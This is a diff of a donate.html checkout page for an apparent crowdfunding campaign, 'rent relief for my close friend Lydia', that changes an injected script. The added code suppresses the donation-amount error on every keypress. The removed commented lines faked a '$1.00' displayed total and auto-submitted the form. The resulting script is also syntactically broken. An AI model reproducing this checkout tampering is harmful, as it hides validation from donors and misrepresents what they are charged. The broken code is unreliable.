--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -1335,18 +1335,13 @@
   </script>
 	 <script>
 		function change(){
-			while(true){
-				if (!!document.querySelector("#root > div > main > div > div > div.l-checkout-single-page > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field > div.m-form-field-alert.mt-half.a-field-alert.a-field-alert--error")){
+			document.onkeypress = function(e) {
+				try{
 					document.querySelector("#root > div > main > div > div > div.l-checkout-single-page > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field--error").className = 'm-form-field m-form-field--stacked o-checkout-donation-amount m-currency-field m-currency-field';
 					document.querySelector("#root > div > main > div > div > div.l-checkout-single-page > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field > div.m-form-field-alert.mt-half.a-field-alert.a-field-alert--error").remove();
+					}
 				}
 			}
-	//document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > button").click();
-	//document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field > div > div > span").innerHTML = "1.00";
-	//document.querySelector("#root > div > main > div > aside > div.p-checkout-summary.show-for-large.o-checkout-summary > dl > dd:nth-child(2)").innerHTML = '$1.00';
-	//document.querySelector("#root > div > main > div > aside > div.p-checkout-summary.show-for-large.o-checkout-summary > dl > dd.color-dark-gray.o-checkout-summary-total-amount").innerHTML = '$1.00';
-			 //document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field--error > div.m-form-field-alert.mt-half.a-field-alert.a-field-alert--error > span").innerHTML = '';
-		}
 	 </script>
  </body>
 </html>
